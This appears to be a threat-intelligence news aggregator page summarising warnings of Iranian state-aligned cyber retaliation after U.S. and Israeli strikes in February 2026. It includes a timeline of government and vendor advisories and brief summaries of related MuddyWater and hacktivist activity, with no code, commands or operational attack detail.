Iran Retaliation Cyber Risk After U.S. and Israeli Strikes
Coordinated U.S. and Israeli strikes on Iranian targets have raised expectations of Iranian state-aligned cyber retaliation against U.S., Israeli, and allied interests. Reporting and vendor intelligence assessments warn that Iran has historically paired kinetic escalation with cyber operations ranging from low-level disruption (website defacements and DDoS) to higher-impact activity (ransomware-style disruption, hack-and-leak operations, espionage, and destructive/wiper malware), with likely targeting pressure on government, critical infrastructure, defense, financial services, academia, and media. The situation is described as fast-moving, with no definitive public attribution yet tying major new cyber campaigns directly to the latest strikes.
Separately, multiple reports highlight unrelated security issues: GreyNoise observed large-scale reconnaissance and SSL VPN enumeration against SonicWall SonicOS devices via commercial proxy infrastructure—activity consistent with precursor targeting that often precedes credential attacks and ransomware intrusions. CISA also issued updated technical details on RESURGE, a stealthy implant used in zero-day exploitation of Ivanti Connect Secure via CVE-2025-0282, including passive C2 behavior and TLS-fingerprint-based authentication/evasion; Mandiant linked the exploitation to China-nexus activity (UNC5221). Other items in the set include a generic IoT security pitfalls article, a weekly security roundup, and a conference write-up, none of which materially advance the Iran-retaliation storyline.
Timeline
Apr 13, 2026
CISA, NSA, and UK NCSC warn of growing Iranian cyber threat
CISA, the NSA, and the UK NCSC issued a warning that Iranian-aligned cyber activity poses a growing risk amid geopolitical tensions and urged organizations to assume they could be targeted. The advisory highlighted exploitation of unpatched vulnerabilities, weak identity controls, exposed remote access, credential attacks, ransomware-style disruption, and risks to sectors including critical infrastructure and OT/ICS.
Mar 12, 2026
Astaara publishes analysis of Iranian cyber capability
Astaara's analysis on Iranian cyber capability was published, indicating continued public assessment of Iran's cyber posture after the regional escalation. No further details were available in the provided reference.
Mar 3, 2026
Halcyon reports MuddyWater preparing Operation Olalampo
Halcyon said it observed Iranian state-linked group MuddyWater preparing an operation dubbed Operation Olalampo targeting the Middle East, Turkey, and Africa, with overlaps to a separate campaign tracked as RedKitten. The report framed this as part of heightened post-strike cyber risk and warned of possible destructive and disruptive retaliation by Iran-aligned actors.
Feb 28, 2026
Experts warn U.S. defenses may be strained during retaliation risk
Nextgov reported expert concerns that likely Iranian cyber retaliation could test U.S. domestic defenses, especially as CISA's warning and coordination capacity may be constrained by staffing and funding issues. The article highlighted elevated risk to critical infrastructure and operational technology, including internet-facing ICS and PLC environments.
Feb 28, 2026
SentinelOne warns of heightened near-term Iranian cyber risk
SentinelOne published an intelligence brief assessing with high confidence that Iranian state-aligned cyber activity is likely to intensify against organizations in Israel, the United States, and allied nations. The company said it had not yet attributed significant malicious cyber activity directly to the current events and had no indication it or its customers were being specifically targeted at publication time.
Feb 28, 2026
Reports emerge of reduced internet connectivity in Iran
Amid the military escalation, reports indicated reduced internet connectivity in Iran, though the cause was described as uncertain. Commentators suggested cyber, electronic, or signals-intelligence activity may have played a role.
Feb 28, 2026
Iran launches attacks across the region after the strikes
Following the strikes, Iran carried out attacks across the region, further escalating tensions. Analysts cited this escalation as increasing the likelihood of near-term state-aligned Iranian cyber operations.
Feb 28, 2026
U.S. and Israeli strikes hit Iranian targets
Coordinated U.S. and Israeli strikes against Iranian targets triggered a new phase of regional escalation and renewed concern about associated cyber activity. Multiple references describe these strikes as the catalyst for expected Iranian cyber retaliation.
Jun 23, 2025
Sysdig warns June 2025 strikes could spur Iranian cyber activity
Sysdig published a threat bulletin warning that the June 22, 2025 U.S. strikes on Iranian nuclear infrastructure could trigger increased cyber operations by Iranian state-sponsored APTs and pro-Iranian hacktivists. The report highlighted risks to cloud and Linux environments and identified groups including APT35, APT33, and Pioneer Kitten.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Threat Actors
Malware
Organizations
Affected Products
Sources
Related Stories
US–Israel Cyber Operations Against Iran and Expected Iranian Retaliation
Reporting described a major escalation in **cyber warfare tied to US and Israeli military operations against Iran**, with claims of widespread disruption inside Iran alongside information operations. One account said Iran experienced a near-total digital blackout (connectivity dropping to ~4% of normal), outages affecting government services and communications, and media/PSYOPS-style intrusions (e.g., defacements/injections on pro-regime sites, hijacked messaging via a widely installed prayer app, and interference with broadcast feeds). The same narrative framed the activity as part of a coordinated campaign (described as *Operation Roaring Lion* / *Epic Fury*) and positioned it as a continuation of long-running US–Israel vs. Iran cyber escalation. Threat intelligence and security firms warned that **Iran-linked actors were already mobilizing for reprisal activity** against Israel and potentially Western/allied targets. Cited reporting said Anomali assessed multiple Iranian groups (including **MuddyWater**, **APT42**, and **APT33**) as “activated and retooling,” while noting an unusual lack of visibility into **APT34** that it interpreted as possible covert pre-positioning rather than inactivity. Flashpoint was cited as observing Iran-linked **Handala Group** activity targeting Israeli **industrial control systems (ICS)** and claiming disruption to manufacturing/energy distribution, alongside claims of data theft affecting an Israeli healthcare organization; the overall guidance was to expect heightened Iranian cyber operations in the wake of kinetic strikes.
1 months ago
Iran-Linked Cyber Activity Escalates Amid Middle East Conflict
Iran-nexus cyber activity intensified alongside regional military escalation, with multiple reporting streams describing both opportunistic and targeted operations. Check Point Research observed a coordinated campaign to compromise internet-connected **IP cameras** across Israel, the UAE, Qatar, Bahrain, Kuwait, Lebanon, and Cyprus, with spikes in exploitation attempts aligning to geopolitical events; activity was traced to infrastructure linked to Iran-nexus actors using commercial VPN exit nodes (e.g., *Mullvad*, *ProtonVPN*, *Surfshark*, *NordVPN*) and VPS infrastructure to mask origin, and the most targeted vendors were **Hikvision** and **Dahua**. Separately, Symantec reported **Seedworm** (*MuddyWater/Temp Zagros/Static Kitten*) activity on multiple U.S. and Canadian organizations beginning in February 2026, including a U.S. bank, airport, non-profit, and the Israeli operations of a U.S. software supplier to defense/aerospace; Symantec identified a previously unknown backdoor dubbed **Dindoor** (leveraging the *Deno* runtime) and a Python backdoor **Fakeset**, with malware signed using certificates issued to “**Amy Cherne**” (and in some cases “**Donald Gay**”), and noted attempted data exfiltration using **Rclone** to a *Wasabi* cloud storage bucket. Additional coverage indicates broader pro-Iranian cyber activity but is less specific to the above intrusions. ASEC’s weekly “Ransom & Dark Web Issues” roundup flags **pro-Iranian/pro-Islamist hacktivist** attacks against Middle Eastern and pro-Western targets, but provides limited technical detail in the excerpt. A podcast episode describing “Iran’s 12 days of cyber war” and global OT targeting (including *Unitronics* PLCs) is largely commentary and retrospective framing rather than a discrete, verifiable incident report, and two other items in the set (a Russia-linked **APT28** phishing/malware campaign in Ukraine and a China-nexus **UAT-9244** telecom intrusion set in South America) describe unrelated threat activity outside the Iran-focused escalation.
1 months ago
Iran-linked MuddyWater intrusions and heightened retaliation risk after U.S.-Israeli strikes
Following the Feb. 28, 2026 U.S.-Israeli strikes on Iran, reporting indicates a **heightened risk of Iranian retaliatory cyber activity** against U.S. and allied organizations, with expected operations spanning **ransomware, DDoS (including as cover for deeper intrusions), data leaks from prior exfiltration, and aggressive social engineering** (e.g., fake job offers and malicious attachments). Likely target sets highlighted include **critical infrastructure**, **banking**, and environments involving **industrial control systems/PLCs**, with emphasis on disciplined execution of security fundamentals (patching, log review, and tighter email/attachment handling) rather than overreliance on automation. Separately, **MuddyWater** (*Seedworm*), an Iran-linked APT, was reported active in multiple U.S. organizations since early Feb. 2026, with activity increasing after the strikes. Symantec and Carbon Black researchers described targeting that included a **U.S. bank**, an **airport**, a **non-profit**, and the **Israel operation of a U.S. software company** supplying the defense/aerospace sector, and identified a previously unknown backdoor, **Dindoor**, observed in several victims; **Dindoor executes via `Deno`** (a JavaScript/TypeScript runtime). Commentary in the reporting also warned to assume potential **pre-positioning** in high-value targets and recommended proactive hunting for signs of persistent access before activation.
1 months ago